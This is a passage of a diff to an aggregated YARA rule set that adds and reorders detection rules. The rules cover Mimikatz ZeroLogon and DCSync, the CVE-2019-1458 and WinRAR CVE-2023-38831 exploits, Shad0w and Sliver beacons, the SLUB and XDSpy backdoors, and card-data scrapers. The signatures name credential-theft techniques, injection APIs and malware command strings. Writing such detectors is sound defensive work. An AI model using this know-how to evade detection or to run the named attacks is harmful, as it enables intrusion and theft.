-		$s1 = "RtlGetVersion"
-		$s2 = {45 33 C9 BA 03 80 00 00 33 C9}
-		$s3 = "SploitWnd"
-		$s4 = "CreateWindowExW"
-		$s5 = "GetKeyboardState"
-		$s6 = "SetKeyboardState"
-		$s7 = "SetWindowLongPtrW"
-		$s9 = "SetClassLongPtrW"
-		$s10 = "DestroyWindow"
-		$s11 = "CreateProcess"
-		$s12 = {4C 8B D1 8B 05 ?? ?? ?? 00 0F 05 C3}
-		$s13 = {80 10 00 00 09 10}
-		$s14 = "NtUserMessageCall"
-		$s15 = "HMValidateHandle"
-		$s16 = "IsMenu"
+		$rch1 = "NetrServerReqChallenge"
+		$rch2 = "NetrServerReqChallenge" wide
+		$auth1 = "NetrServerAuthenticate2"
+		$auth2 = "NetrServerAuthenticate2" wide
+		$pwd1 = "NetrServerPasswordSet2"
+		$pwd2 = "NetrServerPasswordSet2" wide
+		$rpc1 = {78 56 34 12 34 12 CD AB EF 00 01 23 45 67 CF FB}
+		$rpc2 = {00 00 12 08 25 5C 11 08 25 5C 11 00 08 00 1D 00 08 00 02 5B 15 00 08 00 4C 00 F4 FF 5C 5B 11 04 F4 FF 11 08 08 5C 11 00 02 00 15 03 0C 00 4C 00 E4 FF 08 5B 11 04 F4 FF 11 00 08 00 1D 01 00 02 05 5B 15 03 04 02 4C 00 F4 FF 08 5B 11 04 0C 00 1D 00 10 00 4C 00 BE FF 5C 5B 15 00 10 00 4C 00 F0 FF 5C 5B 00}
+		$rpc3 = {00 48 00 00 00 00 04 00 28 00 31 08 00 00 00 5C 3C 00 44 00 46 05 0A 01 00 00 00 00 00 00 00 00 0B 00 00 00 02 00 0B 01 08 00 08 00 0A 01 10 00 14 00 12 21 18 00 14 00 70 00 20 00 08 00 00 48 00 00 00 00 0F 00 40 00 31 08 00 00 00 5C 5E 00 60 00 46 08 0A 01 00 00 00 00 00 00 00 00 0B 00 00 00 02 00 0B 01 08 00 08 00 48 00 10 00 0D 00 0B 01 18 00 08 00 0A 01 20 00 14 00 12 21 28 00 14 00 58 01 30 00 08 00 70 00 38 00 08 00 00 48 00 00 00 00 1E 00 40 00 31 08 00 00 00 5C 8E 02 58 00 46 08 0A 01 00 00 00 00 00 00 00 00 0B 00 00 00 02 00 0B 01 08 00 08 00 48 00 10 00 0D 00 0B 01 18 00 08 00 0A 01 20 00 2A 00 12 41 28 00 2A 00 0A 01 30 00 42 00 70 00 38 00 08 00 00 48 00 00 00 00 2A 00 48 00 31 08 00 00 00 5C 56 00 40 01 46 09 0A 01 00 00 00 00 00 00 00 00 0B 00 00 00 02 00 0B 01 08 00 08 00 48 00 10 00 0D 00 0B 01 18 00 08 00 0A 01 20 00 2A 00 12 41 28 00 2A 00 12 41 30 00 5A 00 12 41 38 00 5A 00 70 00 40 00 08 00 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $rch* ) and 1 of ( $auth* ) and 1 of ( $pwd* ) ) and 2 of ( $rpc* )
 }
+rule SBOUSSEADEN_Hunt_Susp_Vhd : FILE
+{
+	meta:
+		description = "Virtual hard disk file with embedded PE"
+		author = "SBousseaden"
+		id = "14b082b2-c5cd-5f34-85e9-5987650eaacd"
+		date = "2020-07-13"
+		modified = "2020-07-13"
+		reference = "https://github.com/sbousseaden/YaraHunts/"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_susp_vhd.yara#L1-L12"
+		license_url = "N/A"
+		logic_hash = "4ba2e3f533942b27c1d235be4677afdac774b558429c414043a8e3a609123ad3"
+		score = 65
+		quality = 73
+		tags = "FILE"
 
-rule SBOUSSEADEN_Gosliver
+	strings:
+		$hvhd = {636F6E6563746978}
+		$s1 = {4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00}
+		$s2 = "!This program cannot be run in DOS mode." base64
+		$s3 = "!This program cannot be run in DOS mode." xor
+
+	condition:
+		$hvhd at 0 and any of ( $s* ) and filesize <= 10MB
+}
+
+rule SBOUSSEADEN_Susp_Winsvc_Upx : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SBousseaden"
+		description = "broad hunt for any PE exporting ServiceMain API and upx packed"
 		author = "SBousseaden"
-		id = "eba5043a-ca4d-5c5d-a895-51218b03e59e"
-		date = "2020-10-11"
-		modified = "2020-10-11"
-		reference = "https://github.com/BishopFox/sliver"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_sliver_go_framwwork.yara#L2-L9"
+		id = "883691fe-3858-5177-97ca-122ff2ec54af"
+		date = "2019-01-28"
+		modified = "2020-06-05"
+		reference = "https://github.com/sbousseaden/YaraHunts/"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/susp_winsvc_upx.yara#L3-L13"
 		license_url = "N/A"
-		logic_hash = "8dc96e533adc29c78a998d9f064ff294d2ef8a4ff00cef8b0c81ef465ef70b08"
-		score = 75
+		logic_hash = "85b1932eaab4e559f0805aa76ad9b58553708391b3ac894a8e4f1cf34470dcb7"
+		score = 65
 		quality = 75
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$go = "_cgo_"
+		$upx1 = {55505830000000}
+		$upx2 = {55505831000000}
+		$upx_sig = "UPX!"
 
 	condition:
-		#go> 10 and pe.exports ( "RunSliver" )
+		uint16( 0 ) == 0x5a4d and $upx1 in ( 0 .. 1024 ) and $upx2 in ( 0 .. 1024 ) and $upx_sig in ( 0 .. 1024 ) and pe.exports ( "ServiceMain" )
 }
 rule SBOUSSEADEN_APT_Solarwind_Backdoor_Encoded_Strings : FILE
 {
@@ -175432,60 +175205,65 @@ rule SBOUSSEADEN_APT_Solarwind_Backdoor_Encoded_Strings : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and $sw and ( 2 of ( $pat* ) or 2 of ( $priv* ) or all of ( $disc* ) or 2 of ( $wmi* ) or all of ( $key* ) )
 }
-rule SBOUSSEADEN_Zerlologon_Mimikatz : FILE
+rule SBOUSSEADEN_Cve_2019_1458 : FILE
 {
 	meta:
-		description = "Generic Hunting rule for Mimikatz Implementation of ZeroLogon PrivEsc Exploit"
+		description = "No description has been set in the source file - SBousseaden"
 		author = "SBousseaden"
-		id = "0fd32f14-d82d-5af4-b4a2-b21e2325ade8"
-		date = "2020-09-17"
-		modified = "2020-09-17"
-		reference = "https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200916"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_mimikatz_zerologon.yar#L1-L19"
+		id = "7bcbfccb-2db0-5438-9ed1-eee4c92710b6"
+		date = "2020-10-22"
+		modified = "2020-10-23"
+		reference = "https://github.com/unamer/CVE-2019-1458"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_cve_2019_1458.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "5b8d618e8e680acd4e5a9def4e3b56617080dec0c5787c3d6f948489346a6888"
-		score = 50
+		logic_hash = "8c5eac6b9fb9f87e0ffb219f0af8f83475799e062ed339da7a0525180292f5f2"
+		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$rch1 = "NetrServerReqChallenge"
-		$rch2 = "NetrServerReqChallenge" wide
-		$auth1 = "NetrServerAuthenticate2"
-		$auth2 = "NetrServerAuthenticate2" wide
-		$pwd1 = "NetrServerPasswordSet2"
-		$pwd2 = "NetrServerPasswordSet2" wide
-		$rpc1 = {78 56 34 12 34 12 CD AB EF 00 01 23 45 67 CF FB}
-		$rpc2 = {00 00 12 08 25 5C 11 08 25 5C 11 00 08 00 1D 00 08 00 02 5B 15 00 08 00 4C 00 F4 FF 5C 5B 11 04 F4 FF 11 08 08 5C 11 00 02 00 15 03 0C 00 4C 00 E4 FF 08 5B 11 04 F4 FF 11 00 08 00 1D 01 00 02 05 5B 15 03 04 02 4C 00 F4 FF 08 5B 11 04 0C 00 1D 00 10 00 4C 00 BE FF 5C 5B 15 00 10 00 4C 00 F0 FF 5C 5B 00}
-		$rpc3 = {00 48 00 00 00 00 04 00 28 00 31 08 00 00 00 5C 3C 00 44 00 46 05 0A 01 00 00 00 00 00 00 00 00 0B 00 00 00 02 00 0B 01 08 00 08 00 0A 01 10 00 14 00 12 21 18 00 14 00 70 00 20 00 08 00 00 48 00 00 00 00 0F 00 40 00 31 08 00 00 00 5C 5E 00 60 00 46 08 0A 01 00 00 00 00 00 00 00 00 0B 00 00 00 02 00 0B 01 08 00 08 00 48 00 10 00 0D 00 0B 01 18 00 08 00 0A 01 20 00 14 00 12 21 28 00 14 00 58 01 30 00 08 00 70 00 38 00 08 00 00 48 00 00 00 00 1E 00 40 00 31 08 00 00 00 5C 8E 02 58 00 46 08 0A 01 00 00 00 00 00 00 00 00 0B 00 00 00 02 00 0B 01 08 00 08 00 48 00 10 00 0D 00 0B 01 18 00 08 00 0A 01 20 00 2A 00 12 41 28 00 2A 00 0A 01 30 00 42 00 70 00 38 00 08 00 00 48 00 00 00 00 2A 00 48 00 31 08 00 00 00 5C 56 00 40 01 46 09 0A 01 00 00 00 00 00 00 00 00 0B 00 00 00 02 00 0B 01 08 00 08 00 48 00 10 00 0D 00 0B 01 18 00 08 00 0A 01 20 00 2A 00 12 41 28 00 2A 00 12 41 30 00 5A 00 12 41 38 00 5A 00 70 00 40 00 08 00 00 00}
+		$s1 = "RtlGetVersion"
+		$s2 = {45 33 C9 BA 03 80 00 00 33 C9}
+		$s3 = "SploitWnd"
+		$s4 = "CreateWindowExW"
+		$s5 = "GetKeyboardState"
+		$s6 = "SetKeyboardState"
+		$s7 = "SetWindowLongPtrW"
+		$s9 = "SetClassLongPtrW"
+		$s10 = "DestroyWindow"
+		$s11 = "CreateProcess"
+		$s12 = {4C 8B D1 8B 05 ?? ?? ?? 00 0F 05 C3}
+		$s13 = {80 10 00 00 09 10}
+		$s14 = "NtUserMessageCall"
+		$s15 = "HMValidateHandle"
+		$s16 = "IsMenu"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $rch* ) and 1 of ( $auth* ) and 1 of ( $pwd* ) ) and 2 of ( $rpc* )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SBOUSSEADEN_Infinityhook : FILE
+rule SBOUSSEADEN_APT_Xdsspy_Xdupload : FILE
 {
 	meta:
-		description = "Infinityhook is a legit research PoC to hook NT Syscalls bypassing PatchGuard"
+		description = "No description has been set in the source file - SBousseaden"
 		author = "SBousseaden"
-		id = "82f4eef2-fca7-58b1-a85c-3c237f523740"
-		date = "2020-09-07"
-		modified = "2020-07-10"
-		reference = "https://github.com/everdox/InfinityHook"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/infinityhook.yara#L1-L17"
+		id = "ae38d017-6420-596c-af29-62f15cfe56b8"
+		date = "2020-05-10"
+		modified = "2020-10-05"
+		reference = "https://www.welivesecurity.com/2020/10/02/xdspy-stealing-government-secrets-since-2011/"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/apt_xdspy_xdupload.yara#L1-L11"
 		license_url = "N/A"
-		logic_hash = "c621ce3be8049de7584af73ca4472df5561d3c4ac8b458937db2ad68fdcbe2d8"
+		logic_hash = "648ea81d1b44d8514439683cf2f86a8027f9e1eb64abf76d42347fc2ce9c4e68"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$EtwpDebuggerPattern = {00 2C 08 04 38 0C 00}
-		$SMV = {00 00 76 66 81 3A 02 18 50 00 75 0E 48 83 EA 08 B8 33 0F 00}
-		$KVASCODE = {4B 56 41 53 43 4F 44 45}
-		$CKL = "Circular Kernel Context Logger" wide nocase
+		$s1 = "cmd.exe /u /c cd /d \"%s\" & dir /a /-c" wide
+		$s2 = "commandC_dll.dll"
+		$s3 = "cmd.exe /u /c del" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and 2 of ( $s* )
 }
 rule SBOUSSEADEN_Hunt_Common_Credit_Card_Memscrapper : FILE
 {
@@ -175525,63 +175303,232 @@ rule SBOUSSEADEN_Hunt_Common_Credit_Card_Memscrapper : FILE
 		$cc16 = "^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of ( $cc* ) and all of ( $api* )
+		uint16( 0 ) == 0x5a4d and 1 of ( $cc* ) and all of ( $api* )
+}
+
+rule SBOUSSEADEN_Shad0W_Beacon : FILE
+{
+	meta:
+		description = "Shad0w beacon default suspicous strings"
+		author = "SBousseaden"
+		id = "e725172d-dd07-5027-ac85-86d366881856"
+		date = "2020-06-04"
+		modified = "2020-06-05"
+		reference = "https://github.com/bats3c/shad0w"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/shad0w.yara#L3-L15"
+		license_url = "N/A"
+		logic_hash = "9ea7cf72da0d93f607f58b61cc0fb5f3f114d4454101c69b08c59e6b61353550"
+		score = 75
+		quality = 73
+		tags = "FILE"
+
+	strings:
+		$s1 = "LdrLoadD"
+		$s2 = {53 65 74 50 72 2A 65 73 73 4D}
+		$s3 = "Policy"
+
+	condition:
+		uint16( 0 ) == 0x5a4d and all of ( $s* ) and pe.sections [ 0 ] . name == "XPU0" and pe.imports ( "winhttp.dll" , "WinHttpOpen" )
+}
+rule SBOUSSEADEN_Hunt_Evtmutehook_Memory
+{
+	meta:
+		description = "memory hunt for default wevtsv EtwEventCallback hook pattern to apply to eventlog svchost memory dump"
+		author = "SBousseaden"
+		id = "5326581e-90d9-59b9-8dc5-74df97571600"
+		date = "2020-09-05"
+		modified = "2020-09-05"
+		reference = "https://blog.dylan.codes/pwning-windows-event-logging/"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_memory_evtmutehook.yara#L1-L11"
+		license_url = "N/A"
+		logic_hash = "3db66069ed67d90031a6fe071dad4d0200ddd661b263dd2860df026673031e48"
+		score = 50
+		quality = 75
+		tags = ""
+
+	strings:
+		$a = {49 BB ?? ?? ?? ?? ?? ?? ?? ?? 41 FF E3 54 24 20 4C 8B 05 61 CB 1A 00 0F 57 C0 66 0F 7F 44 24 20 E8 5B 0A 00 00 48 83 C4 38 C3}
+		$b = {48 83 EC 38 4C 8B 0D 65 CB 1A 00 48 8D 54 24 20 4C 8B 05 61 CB 1A 00 0F 57 C0 66 0F 7F 44 24 20 E8 5B 0A 00 00 48 83 C4 38 C3}
+
+	condition:
+		$a and not $b
+}
+rule SBOUSSEADEN_Hunt_Slub_Backdoor : FILE
+{
+	meta:
+		description = "No description has been set in the source file - SBousseaden"
+		author = "SBousseaden"
+		id = "c15d5f14-d17f-528b-bf85-e06a5e23518c"
+		date = "2020-10-22"
+		modified = "2020-10-22"
+		reference = "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-kitsune.pdf"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/APT_SLUB_Backdoor.yara#L1-L22"
+		license_url = "N/A"
+		hash = "93bb93d87cedb0a99976c18a37d65f816dc904942a0fb39cc177d49372ed54e5"
+		hash = "59e4510b7b15011d67eb2f80484589f7211e67756906a87ce466a7bb68f2095b"
+		hash = "c7788c015244e12e4c8cc69a2b1344d589284c84102c2f1871bbb4f4c32c2936"
+		hash = "6678a5964db74d477b39bd0a8c18adf02844bed8b112c7bcca6984032918bdfb"
+		logic_hash = "aa17dcfde1e2227ff04bda708d4c40c1e1f07b404d2c43582632d83c98d65e83"
+		score = 50
+		quality = 73
+		tags = "FILE"
+
+	strings:
+		$s1 = "file_infos" ascii wide
+		$s2 = "%ws\\%u_cmd_out.tmp" ascii wide
+		$s3 = "%ws\\%u_cmd_out.zip" ascii wide
+		$s4 = "[was netstat]" ascii wide
+		$s5 = {63 3A 5C 77 6F 72 6B 2E 76 63 70 6B 67 5C 69 6E 73 74 61 6C 6C 65 64 5C 78 36 34 2D 77 69 6E 64 6F 77 73 2D 73 74 61 74 69 63 5C}
+		$s6 = "LoadFileToMemory" ascii wide
+		$s7 = "setStartupExec" ascii wide
+		$s8 = "%04u-%02u-%02u %02u:%02u:%02u" ascii wide
+		$s9 = "goto del_one" ascii wide
+		$s10 = "goto del_two" ascii wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and 3 of them
+}
+rule SBOUSSEADEN_Mimikatz_Memssp_Hookfn
+{
+	meta:
+		description = "hunt for default mimikatz memssp module both ondisk and in memory artifacts"
+		author = "SBousseaden"
+		id = "845827b1-acd4-53af-97fb-43a4fe355fbf"
+		date = "2020-08-26"
+		modified = "2020-08-26"
+		reference = "https://github.com/sbousseaden/YaraHunts/"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/mimikatz_memssp_hookfn.yara#L1-L22"
+		license_url = "N/A"
+		logic_hash = "f63f3de05dd4f4f40cda6df67b75e37d7baa82c4b4cafd3ebdca35adfb0b15f8"
+		score = 75
+		quality = 75
+		tags = ""
+
+	strings:
+		$s1 = {44 30 00 38 00}
+		$s2 = {48 78 00 3A 00}
+		$s3 = {4C 25 00 30 00}
+		$s4 = {50 38 00 78 00}
+		$s5 = {54 5D 00 20 00}
+		$s6 = {58 25 00 77 00}
+		$s7 = {5C 5A 00 5C 00}
+		$s8 = {60 25 00 77 00}
+		$s9 = {64 5A 00 09 00}
+		$s10 = {6C 5A 00 0A 00}
+		$s11 = {68 25 00 77 00}
+		$s12 = {68 25 00 77 00}
+		$s13 = {6C 5A 00 0A 00}
+		$B = {6D 69 6D 69 C7 84 24 8C 00 00 00 6C 73 61 2E C7 84 24 90 00 00 00 6C 6F 67}
+
+	condition:
+		all of ( $s* ) or $B
+}
+
+rule SBOUSSEADEN_Susp_Msoffice_Addins_Wxll : FILE
+{
+	meta:
+		description = "hunt for suspicious MS Office Addins with code injection capabilities"
+		author = "SBousseaden"
+		id = "39d3b2af-f848-51c0-a13b-13c0fe3a79dd"
+		date = "2020-11-10"
+		modified = "2023-03-27"
+		reference = "https://twitter.com/JohnLaTwC/status/1315287078855352326"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_susp_msoffice_addins_wxll.yara#L3-L29"
+		license_url = "N/A"
+		logic_hash = "130a0292b16e934311597d4f91456e6a605477e306a7b1d8171cc4e13794db31"
+		score = 65
+		quality = 75
+		tags = "FILE"
+
+	strings:
+		$inj1 = "WriteProcessMemory"
+		$inj2 = "NtWriteVirtualMemory"
+		$inj3 = "RtlMoveMemory"
+		$inj4 = "VirtualAllocEx"
+		$inj5 = "NtAllocateVirtualMemory"
+		$inj6 = "NtUnmapViewOfSection"
+		$inj7 = "VirtualProtect"
+		$inj8 = "NtProtectVirtualMemory"
+		$inj9 = "SetThreadContext"
+		$inj10 = "NtSetContextThread"
+		$inj11 = "ResumeThread"
+		$inj12 = "NtResumeThread"
+		$inj13 = "QueueUserAPC"
+		$inj14 = "NtQueueApcThread"
+		$inj15 = "NtQueueApcThreadEx"
+		$inj16 = "CreateRemoteThread"
+		$inj17 = "NtCreateThreadEx"
+		$inj18 = "RtlCreateUserThread"
+
+	condition:
+		uint16( 0 ) == 0x5a4d and ( pe.exports ( "wdAutoOpen" ) or pe.exports ( "xlAutoOpen" ) ) and 3 of ( $inj* )
 }
-
-rule SBOUSSEADEN_Shad0W_Beacon : FILE
+rule SBOUSSEADEN_Shad0W_Beacon_16June : FILE
 {
 	meta:
-		description = "Shad0w beacon default suspicous strings"
+		description = "Shad0w beacon compressed"
 		author = "SBousseaden"
-		id = "e725172d-dd07-5027-ac85-86d366881856"
-		date = "2020-06-04"
-		modified = "2020-06-05"
+		id = "1229e84f-bf6e-5e87-9351-a48cd50397b0"
+		date = "2020-06-16"
+		modified = "2020-06-17"
 		reference = "https://github.com/bats3c/shad0w"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/shad0w.yara#L3-L15"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/shad0w_beacon_16June.yara#L1-L13"
 		license_url = "N/A"
-		logic_hash = "9ea7cf72da0d93f607f58b61cc0fb5f3f114d4454101c69b08c59e6b61353550"
+		logic_hash = "c313e995d6eaae6d2ee63964f6fc94964065af7a61d7f304280d914e6f0dd548"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "LdrLoadD"
-		$s2 = {53 65 74 50 72 2A 65 73 73 4D}
-		$s3 = "Policy"
+		$s1 = {F2 AE ?? ?? ?? FF 15 ?? ?? 00 00 48 09 C0 74 09}
+		$s2 = {33 2E 39 36 00 ?? ?? ?? 21 0D 24 0E 0A}
+		$s3 = "VirtualProtect"
+		$s4 = "GetProcAddress"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* ) and pe.sections [ 0 ] . name == "XPU0" and pe.imports ( "winhttp.dll" , "WinHttpOpen" )
+		uint16( 0 ) == 0x5a4d and all of ( $s* )
 }
-rule SBOUSSEADEN_Hunt_Susp_Vhd : FILE
+rule SBOUSSEADEN_Dcsync_Mimikatz : FILE
 {
 	meta:
-		description = "Virtual hard disk file with embedded PE"
+		description = "Hunting rule for Mimikatz Implementation of DCSync Attack"
 		author = "SBousseaden"
-		id = "14b082b2-c5cd-5f34-85e9-5987650eaacd"
-		date = "2020-07-13"
-		modified = "2020-07-13"
-		reference = "https://github.com/sbousseaden/YaraHunts/"
-		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_susp_vhd.yara#L1-L12"
+		id = "2d5d5fdb-8a84-5e88-b136-4e3e788c46cd"
+		date = "2020-09-22"
+		modified = "2020-09-22"
+		reference = "https://github.com/gentilkiwi/mimikatz"
+		source_url = "https://github.com/sbousseaden/YaraHunts//blob/71b27a2a7c57c2aa1877a11d8933167794e2b4fb/hunt_mimikatz_dcsync.yara#L1-L24"
 		license_url = "N/A"
-		logic_hash = "4ba2e3f533942b27c1d235be4677afdac774b558429c414043a8e3a609123ad3"
-		score = 65
-		quality = 73
+		logic_hash = "436979d794b7b599f2186252c7f233f091100880c2d39008d8bd7f839553fb53"
+		score = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$hvhd = {636F6E6563746978}
-		$s1 = {4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00}
-		$s2 = "!This program cannot be run in DOS mode." base64
-		$s3 = "!This program cannot be run in DOS mode." xor
+		$DRS1 = "DRSGetNCChanges"
+		$DRS2 = "DRSReplicaAdd"
+		$DRS3 = "DRSAddEntry"
+		$DRSW1 = "DRSGetNCChanges" wide
+		$DRSW2 = "DRSReplicaAdd" wide
+		$DRSW3 = "DRSAddEntry" wide
+		$rpc1 = {35 42 51 E3 06 4B D1 11 AB 04 00 C0 4F C2 DC D2 04 00 00 00 04 5D 88 8A EB 1C C9 11 9F E8 08 00 2B 10 48 60 02}
+		$rpc2 = {34 05 50 21 18 00 08 00 13 81 20 00 8A 05 70 00 28}
+		$rpc3 = {0B 01 10 00 DC 05 50 21 18 00 08 00 13 21 20 00 2E 06 70 00 28}
+		$rpc4 = {48 06 50 21 18 00 08 00 13 41 20 00 72 06 70 00 28}
+		$rpc5 = {78 03 0B 00 10 00 7C 03 13 20 18 00 A4 03 10 01 20 00 AC 03 70 00 28}
+		$rpc6 = {C0 03 50 21 18 00 08 00 13 01 20 00 74 04 70 00 28}
+		$rpc7 = {8C 06 50 21 18 00 08 00 13 A1 20 00 C6 06 70 00 28}
+		$def1 = "mimikatz"
+		$def2 = "mimikatz" wide
 
 	condition:
-		$hvhd at 0 and any of ( $s* ) and filesize <= 10MB
+		uint16( 0 ) == 0x5a4d and ( all of ( $DRS* ) or all of ( $DRSW* ) ) and all of ( $rpc* ) and not ( any of ( $def* ) )
 }
 /*
  * YARA Rule Set
  * Repository Name: Elceef
  * Repository: https://github.com/elceef/yara-rulz
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: 791721372091836f5bf477d7f21114f45a310052
  * Number of Rules: 19
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -175612,88 +175559,234 @@ OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
 SOFTWARE.
 
  */
-rule ELCEEF_HTA_Wscriptshell_Onenote : FILE
+rule ELCEEF_Winrar_CVE_2023_38831_Exploit : CVE_2023_38831 FILE
 {
 	meta:
-		description = "Detects suspicious OneNote documents with embedded HTA + WScript.Shell"
+		description = "Detects ZIP archives exploiting CVE-2023-38831 in WinRAR"
 		author = "marcin@ulikowski.pl"
-		id = "8cebd862-8dfb-5f5d-befb-5c41cde945ff"
-		date = "2023-02-01"
-		modified = "2023-02-02"
-		reference = "https://github.com/elceef/yara-rulz"
-		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/HTA_OneNote.yara#L1-L17"
+		id = "7d592eb7-b344-59ed-adf8-fe69ebb1e43f"
+		date = "2023-09-23"
+		modified = "2023-09-28"
+		reference = "https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day"
+		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/WinRAR_CVE_2023_38831.yara#L1-L17"
 		license_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/LICENSE"
-		logic_hash = "0287ac5d618c9a8332d167f1a05157aa829c7e8a052c35100fcaeb644d452e5c"
-		score = 65
+		logic_hash = "06f1d807429fb175831cf333b05b44b6ce33b4ae981e16c03e36ec7564a4fdd1"
+		score = 75
 		quality = 75
-		tags = "FILE"
-		hash1 = "002fe00bc429877ee2a786a1d40b80250fd66e341729c5718fc66f759387c88c"
+		tags = "CVE-2023-38831, FILE"
+		hash1 = "00175d538cba0c493e397a0b7f4b28f9a90dd0ee40f69795ae28d23ce0d826c0"
+		hash2 = "ca8ca67df7853b86b6a107c8fd7f73b757de9143ea8844d0e6209249e8377885"
 
 	strings:
-		$magic = { ae b1 53 78 d0 29 96 d3 }
-		$hta = { 00 04 00 00 00 2e 00 68 00 74 00 61 }
-		$wsh = "CreateObject(\"WScript.Shell\")"
+		$ = { 50 4b 03 04 [24] 00 00 [3-64] 2e ?? ?? ?? 20 2f [3-64] 2e ?? ?? ?? 20 2e ( 626174 | 636d64 | 707331 ) }
 
 	condition:
-		filesize < 5MB and $magic at 8 and $wsh and $hta
+		uint16be( 0 ) == 0x504b and all of them
 }
-rule ELCEEF_Suspicious_SFX : FILE
+rule ELCEEF_OLE2_Autoopen_Reversed_Payload : FILE
 {
 	meta:
-		description = "Detects self-extracting archives (SFX) executing cmd.exe or powershell.exe"
+		description = "Detects suspiciously reversed payloads in OLE2 objects with auto-open macros"
 		author = "marcin@ulikowski.pl"
-		id = "78f4ae8b-ba17-5c02-a6f0-66bec873aba8"
-		date = "2023-04-04"
+		id = "9244fdb7-9949-58a0-9e39-e61e04cc1574"
+		date = "2021-12-01"
 		modified = "2023-04-04"
-		reference = "https://www.crowdstrike.com/blog/self-extracting-archives-decoy-files-and-their-hidden-payloads/"
-		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/Suspicious_SFX.yara#L1-L22"
+		reference = "https://github.com/elceef/yara-rulz"
+		source_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/rules/OLE2_Reversed.yara#L1-L20"
 		license_url = "https://github.com/elceef/yara-rulz/blob/791721372091836f5bf477d7f21114f45a310052/LICENSE"
-		logic_hash = "688ed356e2fa936a0e07a8479591c28fb457053ed94351bad4bf367b02f04b0a"
+		logic_hash = "425750e77d31ddc356f803ee6e2f192f93f64534a9633fef02da5caaa60dbcaf"
 		score = 65
-		quality = 73
+		quality = 67
 		tags = "FILE"
 
 	strings:
-		$rar = { 52 61 72 21 }
-		$zip = { 50 4b 03 04 }
-		$setup_cmd = "\nSetup=cmd"
-		$setup_powershell = "\nSetup=powershell"
-		$silent = "\nSilent=1"
+		$auto_open = /(auto|document|workbook)_?(open|close)/ wide ascii nocase
+		$http = /\/\/:s?ptth/ wide ascii
+		$programdata = /\\ataDmargorP\\\\?:C/ wide ascii nocase
+		$windows = /\\swodniW\\\\?:C/ wide ascii nocase
 
 	condition:
-		filesize < 1MB and uint16be( 0 ) == 0x4d5a and any of ( $zip , $rar ) and any of ( $setup_* ) and $silent
+		filesize < 1MB and uint32be( 0 ) == 0xd0cf11e0 and $auto_open and any of ( $http , $programdata , $windows )
 }
-rule ELCEEF_Suspicious_Onenote
+rule ELCEEF_Base64_SVG_Javascript
 {
 	meta:
-		description = "Detects OneNote documents with FileDataStoreObject structure containing: PE32, shortcut files (*.lnk), encoded JS, Windows Help File (*.chm), or batch script"
+		description = "Detects base64 encoded SVG objects containing Javascript"
 		author = "marcin@ulikowski.pl"
-		id = "57f6fc7f-666f-5887-ac97-513588415757"
-		date = "2023-01-22"
-		modified = "2023-02-21"
+		id = "99275772-1f4f-5616-9a9c-f76b613fe143"
